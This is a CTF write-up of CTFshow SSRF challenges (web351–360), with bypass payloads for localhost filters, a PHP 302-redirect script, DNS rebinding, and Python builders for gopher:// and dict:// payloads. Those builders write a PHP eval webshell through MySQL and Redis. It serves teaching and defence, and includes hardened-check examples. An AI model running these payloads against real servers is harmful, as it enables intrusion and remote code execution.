CTFshow-WEB Introduction-SSRF

Preface

To start learning SSRF I studied this article:
SSRF learning record (requires a VPN to reach)
For the simpler challenges I just give the payload without explanation.

web351

url=http://127.0.0.1/flag.php

web352

The scheme must be http or https, and the URL may not contain 127.0.0.1 or localhost. There are many ways to bypass this; some commonly used ones:

  • Hex (or another base) notation: url=http://0x7F000001/flag.php
  • 0.0.0.0: url=http://0.0.0.0/flag.php
  • A short URL (link shortener) pointing at the local host; my test failed for this challenge, maybe a problem with my shortener?
  • IPv6 [::1]; this also does not work for this challenge.
  • Full-width periods: url=http://127。0。0。1/flag.php; this also does not work for this challenge.
  • Special addresses such as 0: url=http://0/flag.php, url=http://127.1/flag.php, url=http://127.0000000000000.001/flag.php and the like.
  • DNS rebinding would also work here in principle, but it does not seem to work on this challenge? I am not sure whether it is my DNS.
  • There are probably more; I will add them as I think of them.
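Why the literal-string blacklist in this challenge lets all of those forms through: the host is only compared as text, while the thing that connects understands the inet_aton() grammar (1 to 4 dot-separated parts; decimal, octal with a leading 0, or hex with 0x; the last part fills the remaining bytes). The code below is an added example, not part of the original write-up or the challenge: it re-implements that grammar in pure Python so it runs offline, then contrasts the web352-style check with one that canonicalizes first. The URL list, the check functions and the use of 0.0.0.0 as "local" (Linux routes it to the host) are assumptions of this example.

```python
"""Added example: canonicalize numeric IPv4 hosts the way inet_aton() does,
then compare a string blacklist with a check on the canonical address.
Not from the original write-up; hostnames and helper names are constructed."""
import ipaddress
from urllib.parse import urlsplit


def _parse_part(part: str) -> int:
    # inet_aton rules: "0x" prefix = hex, leading "0" = octal, else decimal
    if not (part.isascii() and part.isalnum()):
        raise ValueError(part)
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def canonicalize_ipv4(host: str):
    """Return the dotted quad a host string really denotes, or None if it is
    not a numeric IPv4 literal under inet_aton() rules."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    # every part but the last is one byte; the last fills what is left
    if any(n > 0xFF for n in nums[:-1]):
        return None
    last_width = 8 * (5 - len(parts))  # 32, 24, 16 or 8 bits
    if nums[-1] >= 1 << last_width:
        return None
    value = 0
    for n in nums[:-1]:
        value = (value << 8) | n
    value = (value << last_width) | nums[-1]
    return str(ipaddress.IPv4Address(value))


def naive_blacklist_allows(url: str) -> bool:
    """The web352-style check: reject only the two literal strings."""
    host = urlsplit(url).hostname or ""
    return host not in ("127.0.0.1", "localhost")


def resolved_is_local(url: str) -> bool:
    """Hardened check: canonicalize numeric hosts, then test the address
    class.  0.0.0.0 counts as local because Linux routes it to the host.
    Non-numeric hosts still need a DNS lookup (see web357)."""
    host = urlsplit(url).hostname or ""
    dotted = canonicalize_ipv4(host)
    if dotted is None:
        return host == "localhost"
    addr = ipaddress.IPv4Address(dotted)
    return addr.is_loopback or addr.is_unspecified or addr.is_private


# constructed list: the forms from the bullet list above plus two more
BYPASSES = [
    "http://0x7F000001/flag.php",
    "http://0.0.0.0/flag.php",
    "http://0/flag.php",
    "http://127.1/flag.php",
    "http://127.0000000000000.001/flag.php",
    "http://2130706433/flag.php",  # plain decimal
    "http://0177.0.0.1/flag.php",  # octal first octet
]

if __name__ == "__main__":
    for u in BYPASSES:
        host = urlsplit(u).hostname
        print(f"{u:42} blacklist allows={naive_blacklist_allows(u)!s:5} "
              f"local={resolved_is_local(u)!s:5} -> {canonicalize_ipv4(host)}")
```

Run it and every entry prints as allowed by the blacklist yet local after canonicalization; the octal and decimal forms are not in the challenge list but follow from the same grammar.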

web353

Same as above.

web354

After 0 and 1 are banned as well I didn't know what to do, so I read Master Yu's blog. The intended solution of this challenge is to substitute Unicode characters:

# Scan the BMP for characters whose IDNA (nameprep/NFKC) mapping yields
# plain ASCII; results containing "-" are Punycode (xn--...) and are skipped.
for i in range(128, 65537):
    tmp = chr(i)
    try:
        res = tmp.encode('idna').decode('utf-8')
        if "-" in res:
            continue
        print("U:{}    A:{}      ascii:{} ".format(tmp, res, i))
    except ValueError:  # UnicodeError: prohibited, empty or too-long label
        pass

IDNA (Internationalizing Domain Names in Applications) is the standard mechanism for representing non-ASCII characters in domain names: a name written with Unicode characters is mapped to an ASCII form so that it can be used with the existing DNS.

Internationalized Domain Names (IDN) were first proposed by Martin Dürst in December 1996. In 1998, under the guidance of Professor Tan Tin Wee at the National University of Singapore, Tan Juay Kwang and Leong Kok Yong put the idea into practice. After much discussion and comparison of proposals, Internationalizing Domain Names in Applications (IDNA) was adopted as the official standard and is used by many top-level domains. In IDNA, "internationalized domain name" specifically means a domain name that can be successfully converted to ASCII by the IDNA ToASCII operation.

But this challenge is badly behaved and quite annoying, so I used my own domain name and pointed it at 127.0.0.1.
Or use Master Yu's: http://sudo.cc/ is a domain name that resolves to 127.0.0.1; you can use it directly.
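To show what the scan above is for, the following added example (not from the original post or the challenge) turns the loop into a lookup table and uses it to respell 127.0.0.1 without any ASCII 0 or 1. Python's idna codec implements IDNA 2003 (nameprep, which includes NFKC normalization, followed by Punycode), so characters such as ¹ or ⓪ fold to the ASCII digits before the name reaches DNS. Whether the trick works against a given target depends on its fetcher applying the same IDNA mapping; the banned-character set and the host are assumptions of this example.

```python
"""Added example: map ASCII letters/digits to the Unicode code points that
IDNA 2003 (Python's 'idna' codec) folds onto them, and respell a host so it
avoids banned ASCII characters.  Not part of the original write-up."""
from functools import lru_cache


@lru_cache(maxsize=None)
def idna_equivalents(limit: int = 0x10000):
    """ascii char -> list of code points whose IDNA encoding is exactly it.
    Same probe as the scan above, collected instead of printed."""
    table = {}
    for cp in range(0x80, limit):
        ch = chr(cp)
        try:
            ascii_form = ch.encode("idna").decode("ascii")
        except ValueError:      # UnicodeError: prohibited/empty label
            continue
        if len(ascii_form) == 1 and ascii_form.isalnum():
            table.setdefault(ascii_form, []).append(ch)
    return table


def unicode_spell(host: str, banned: str) -> str:
    """Replace every banned ASCII character in host with the first Unicode
    character that IDNA folds back onto it; everything else is kept."""
    table = idna_equivalents()
    out = []
    for ch in host:
        if ch in banned:
            if ch not in table:
                raise ValueError(f"no IDNA equivalent for {ch!r}")
            out.append(table[ch][0])
        else:
            out.append(ch)
    return "".join(out)


def idna_ascii(host: str) -> str:
    """What a fetcher applying IDNA 2003 would actually resolve."""
    return host.encode("idna").decode("ascii")


if __name__ == "__main__":
    spelled = unicode_spell("127.0.0.1", banned="01")   # assumed ban list
    print(spelled, "->", idna_ascii(spelled))
    print("circled digits:", idna_ascii("①②⑦.⓪.⓪.①"))
```

The round trip idna_ascii(unicode_spell(...)) is the check to run before using such a host: if it does not come back as 127.0.0.1 here, it will not on the target either.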

web355

This restriction was added: if ((strlen($host) <= 5)) { so the host may be at most five characters long. 127.1 certainly fits, and so does 0.

url=http://0/flag.php

web356

url=http://0/flag.php

On Linux, 0 (i.e. 0.0.0.0) is routed to the local machine, so it behaves like 127.0.0.1; on Windows it is treated as 0.0.0.0 instead.

web357

if($x['scheme']==='http'||$x['scheme']==='https'){
    // $x is parse_url() of the POSTed url; the host is resolved once here...
    $ip = gethostbyname($x['host']);
    echo '</br>'.$ip.'</br>';
    // ...and private/reserved addresses are rejected...
    if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
        die('ip!');
    }
    // ...but the fetch goes by the original name: resolved again, redirects followed
    echo file_get_contents($_POST['url']);
}

Either a 302 redirect or DNS rebinding works. For the 302 redirect I learned a new trick from Master Yu: put this on your VPS:

<?php
header("Location:http://127.0.0.1/flag.php");

Then submit url=http://xxx.xxx.xxx.xxx/xxx.php: gethostbyname() returns the VPS's public IP, which passes the filter, and file_get_contents() follows the redirect to 127.0.0.1.

For DNS rebinding, use a rebinding service (the original post links one).
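Both bypasses exploit the same gap in the challenge code: the address that was validated is not the address that gets connected to. The added example below (not the challenge's code or the original post's) simulates the network offline so the race is visible: a resolver whose answers can change between lookups, a table of what each IP would serve, the challenge's resolve-validate-fetch order beside a fetch that pins each hop to the IP it validated. The names vps.example and rebind.example, the IP 11.22.33.44 standing in for the VPS, and the flag text are placeholders.

```python
"""Added example: why validate-then-fetch-by-name fails against a 302 or
DNS rebinding, and what pinning the validated IP changes.  The network is
simulated; names, IPs and contents are constructed placeholders."""
import ipaddress
from urllib.parse import urlsplit

ATTACKER_IP = "11.22.33.44"               # placeholder public IP of the VPS
FLAG = "ctfshow{constructed-flag}"        # constructed body of /flag.php


def make_resolver(answers):
    """answers: name -> IPs handed out on successive lookups (last repeats).
    IP literals resolve to themselves, as with gethostbyname()."""
    calls = {}

    def resolve(host):
        try:
            return str(ipaddress.ip_address(host))
        except ValueError:
            pass
        seq = answers[host]
        n = calls.get(host, 0)
        calls[host] = n + 1
        return seq[min(n, len(seq) - 1)]
    return resolve


def ip_is_internal(ip: str) -> bool:
    """Roughly FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE."""
    a = ipaddress.ip_address(ip)
    return (a.is_private or a.is_loopback or a.is_link_local
            or a.is_reserved or a.is_unspecified)


def fetch_like_web357(url, resolve, servers, max_hops=5):
    """gethostbyname() once, validate, then fetch by name: the fetch does
    its own lookup and follows Location headers without re-checking."""
    if ip_is_internal(resolve(urlsplit(url).hostname)):
        return "ip!"
    for _ in range(max_hops):
        ip = resolve(urlsplit(url).hostname)          # second lookup
        status, headers, body = servers.get(ip, (404, {}, ""))
        if status == 302:
            url = headers["Location"]                 # followed blindly
            continue
        return body
    return ""


def fetch_pinned(url, resolve, servers, max_hops=5):
    """Resolve once per hop, validate that IP, connect to that same IP, and
    re-validate every redirect target before following it."""
    for _ in range(max_hops):
        ip = resolve(urlsplit(url).hostname)
        if ip_is_internal(ip):
            return "ip!"
        status, headers, body = servers.get(ip, (404, {}, ""))
        if status == 302:
            url = headers["Location"]
            continue
        return body
    return ""


def redirect_scenario():
    """VPS answers 302 Location: http://127.0.0.1/flag.php (the xxx.php above)."""
    servers = {ATTACKER_IP: (302, {"Location": "http://127.0.0.1/flag.php"}, ""),
               "127.0.0.1": (200, {}, FLAG)}
    url = "http://vps.example/xxx.php"
    return (fetch_like_web357(url, make_resolver({"vps.example": [ATTACKER_IP]}), servers),
            fetch_pinned(url, make_resolver({"vps.example": [ATTACKER_IP]}), servers))


def rebinding_scenario():
    """Name answers the public IP first and 127.0.0.1 on the next lookup."""
    servers = {ATTACKER_IP: (200, {}, "harmless page"),
               "127.0.0.1": (200, {}, FLAG)}
    url = "http://rebind.example/"
    answers = {"rebind.example": [ATTACKER_IP, "127.0.0.1"]}
    return (fetch_like_web357(url, make_resolver(answers), servers),
            fetch_pinned(url, make_resolver(answers), servers))


if __name__ == "__main__":
    print("302:      challenge=%r pinned=%r" % redirect_scenario())
    print("rebinding: challenge=%r pinned=%r" % rebinding_scenario())
```

In both scenarios the challenge-style fetch returns the flag and the pinned fetch does not; in real code the pinning means connecting to the validated IP with the Host header set to the original name, and treating each redirect as a new request to validate.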

web358

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
// the regex runs on the raw string; the fetch uses whatever that string parses to
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
    echo file_get_contents($url);
}

The URL must start with http://ctf. and must end with show.
Ending with show is easy: either #show or ?a=show will do.
For the start, add @127.0.0.1 after http://ctf., so that the host parse_url() sees is 127.0.0.1. Recall the generic URL form scheme://user[:pass]@host[:port]/path (as with ftp://): everything before the @ is the userinfo, so the preceding ctf. is parsed as the user name.

url=http://ctf.@127.0.0.1/flag.php#show

web359

This one attacks MySQL. The principle is covered in the article from the preface, but doing it by hand is tedious: run the MySQL statement locally, capture the packets with Wireshark, then build the gopher payload from the capture. Instead we use the universal SSRF tool:
Gopherus
It runs on Python 2; the usage is documented clearly on GitHub and in its help output.
The SSRF point of this challenge is the returl parameter (screenshot in the original post).
The response is not echoed, so instead of reading data we use the MySQL query to write a webshell (screenshot in the original post). URL-encode the part of the Gopherus output after the _ once more before submitting it (screenshot in the original post).
Once the shell is written, the flag can be found through RCE.
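What the Wireshark step (or Gopherus) produces is just the client's side of a MySQL session, serialized so that gopher:// replays it. The added example below is not Gopherus output and not the challenge's code; it builds the login packet and a COM_QUERY by hand from the MySQL client/server protocol (HandshakeResponse41, then COM_QUERY and COM_QUIT) and wraps the bytes in a gopher URL. The account name, query and paths are placeholders. It assumes a password-less account: with mysql_native_password the auth response would have to be derived from the server's random scramble, which a blind SSRF never gets to read, which is exactly why this trick only works when the password is empty.

```python
"""Added example: hand-built MySQL login + query as a gopher:// payload.
Not Gopherus output; user, query and target are constructed placeholders."""
import struct
from urllib.parse import quote, unquote_to_bytes

# capability flags from the MySQL client/server protocol
CLIENT_LONG_PASSWORD     = 0x00000001
CLIENT_LONG_FLAG         = 0x00000004
CLIENT_PROTOCOL_41       = 0x00000200
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH       = 0x00080000
CAPS = (CLIENT_LONG_PASSWORD | CLIENT_LONG_FLAG | CLIENT_PROTOCOL_41
        | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH)
COM_QUIT = b"\x01"

# placeholder: writing with INTO OUTFILE needs the FILE privilege and a
# secure_file_priv setting that permits the directory
SHELL_SQL = "select '<?php eval($_POST[1]);?>' into outfile '/var/www/html/1.php'"


def mysql_packet(payload: bytes, seq: int) -> bytes:
    """3-byte little-endian payload length, 1-byte sequence id, payload."""
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


def handshake_response(user: str) -> bytes:
    """HandshakeResponse41 for an empty password: the auth-response is
    empty, so its one-byte length field is 0."""
    body = struct.pack("<IIB", CAPS, 0x01000000, 33)  # caps, max packet, utf8
    body += b"\x00" * 23                               # reserved
    body += user.encode() + b"\x00"                    # NUL-terminated user
    body += b"\x00"                                    # auth-response length 0
    body += b"mysql_native_password\x00"               # plugin (CLIENT_PLUGIN_AUTH)
    return body


def com_query(sql: str) -> bytes:
    return b"\x03" + sql.encode()                      # COM_QUERY


def mysql_session(user: str, sql: str) -> bytes:
    """The greeting (seq 0) comes from the server and is never seen in a
    blind SSRF; our reply is seq 1, and each new command restarts at 0."""
    return (mysql_packet(handshake_response(user), 1)
            + mysql_packet(com_query(sql), 0)
            + mysql_packet(COM_QUIT, 0))


def gopher_url(host: str, port: int, data: bytes) -> str:
    """gopher://host:port/_<percent-encoded bytes>; the '_' is a dummy item
    type the client strips, the rest is sent verbatim once decoded."""
    return f"gopher://{host}:{port}/_" + quote(data, safe="")


def decode_gopher(url: str) -> bytes:
    return unquote_to_bytes(url.split("/_", 1)[1])


def split_packets(data: bytes):
    """Turn a byte stream back into (seq, payload) pairs, for checking."""
    out, i = [], 0
    while i < len(data):
        n = int.from_bytes(data[i:i + 3], "little")
        out.append((data[i + 3], data[i + 4:i + 4 + n]))
        i += 4 + n
    return out


if __name__ == "__main__":
    print(gopher_url("127.0.0.1", 3306, mysql_session("root", SHELL_SQL)))
```

When the resulting URL goes into the returl POST parameter it must be URL-encoded a second time (the "encode the part after the _" step above), otherwise the %0D%0A sequences are decoded by the web layer before curl sees them.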

web360

SSRF against Redis has basically four attack methods:

  • Write a webshell
  • Write an SSH public key
  • Write a crontab scheduled task for a reverse shell
  • Master-slave replication

For this challenge we write a shell. First use the dict protocol to check whether port 6379 is open; if the target's Redis has been moved to another port, probe for it with dict in the same way (screenshot in the original post).
For the specific principles of attacking Redis, refer to this article:
Analysis of the exploitation of SSRF against Redis (Chinese article)
Don't blindly use the Gopherus tool; understand the principle first.
For this challenge I did not use Gopherus, in order to get familiar with the manual method. First check whether authentication is required (screenshot in the original post): it is not needed here; if it were, brute-force it with Burp:

url=dict://127.0.0.1:6379/auth:xxx

Use : in place of spaces (curl's dict handler turns every : in the path into a space before sending the command).
Set dir, the directory Redis saves its database file to (screenshot in the original post).
Write the webshell; there may be escaping or filtering, so writing it in hexadecimal usually succeeds (screenshot in the original post).
Set the file name (dbfilename) (screenshot in the original post).
Save (screenshot in the original post).
Visit the file to confirm the write succeeded (screenshot in the original post).
Then just look for the flag.
If the shell cannot be written, try master-slave replication.
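The four steps above issue the same Redis commands whichever transport carries them. The added example below (not the write-up's screenshots and not Gopherus) builds them both ways: as dict:// URLs, one command per request with : standing in for spaces and the PHP body in Redis's "\xHH" quoted form so no space, quote or angle bracket appears in the URL, and as one gopher:// request carrying the RESP encoding, where bulk strings are length-prefixed and need no escaping at all. Web root, file name, key name and shell body are placeholders.

```python
"""Added example: the Redis webshell commands as dict:// URLs and as one
gopher:// RESP payload.  Paths, key and shell body are placeholders."""
from urllib.parse import quote, unquote_to_bytes

PHP = "<?php eval($_POST[1]);?>"          # placeholder shell body


def resp(*args: str) -> bytes:
    """RESP array of bulk strings, the wire form redis-cli sends.  Each
    bulk string carries its byte length, so nothing needs escaping."""
    out = f"*{len(args)}\r\n".encode()
    for a in args:
        b = a.encode()
        out += f"${len(b)}\r\n".encode() + b + b"\r\n"
    return out


def hex_quoted(s: str) -> str:
    """Redis's inline protocol accepts "\\xHH" inside double quotes; this
    keeps '<', '?', spaces and quotes out of the URL entirely."""
    return '"' + "".join(f"\\x{b:02x}" for b in s.encode()) + '"'


def webshell_steps(webroot, filename, key, php):
    """The four commands from the walkthrough above, in order."""
    return [("config", "set", "dir", webroot),
            ("set", key, php),
            ("config", "set", "dbfilename", filename),
            ("save",)]


def dict_url(host, port, *words):
    """dict://host:port/<words joined by ':'>: curl's dict handler rewrites
    every ':' in that path to a space, hence ':' instead of spaces, and
    hence an argument may not itself contain ':'."""
    if any(":" in w for w in words):
        raise ValueError("dict transport cannot carry ':' inside an argument")
    return f"dict://{host}:{port}/" + ":".join(words)


def dict_urls(host, port, steps):
    urls = []
    for step in steps:
        if step[0] == "set":          # quote the PHP so it survives as one word
            step = (step[0], step[1], hex_quoted(step[2]))
        urls.append(dict_url(host, port, *step))
    return urls


def gopher_url(host, port, steps):
    """All commands in one request; Redis answers each in turn."""
    payload = b"".join(resp(*step) for step in steps)
    return f"gopher://{host}:{port}/_" + quote(payload, safe="")


def decode_gopher(url: str) -> bytes:
    return unquote_to_bytes(url.split("/_", 1)[1])


if __name__ == "__main__":
    steps = webshell_steps("/var/www/html", "1.php", "x", PHP)
    print(dict_url("127.0.0.1", 6379, "info"))        # probe / auth check
    for u in dict_urls("127.0.0.1", 6379, steps):
        print(u)
    print(gopher_url("127.0.0.1", 6379, steps))
```

The dict form is what the screenshots in the original post show, one request per step; the gopher form is what Gopherus would emit for the same steps. Either way the URL still has to be URL-encoded once more when it is placed in the POST body.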

Source: blog.csdn.net/rfrder/article/details/113853929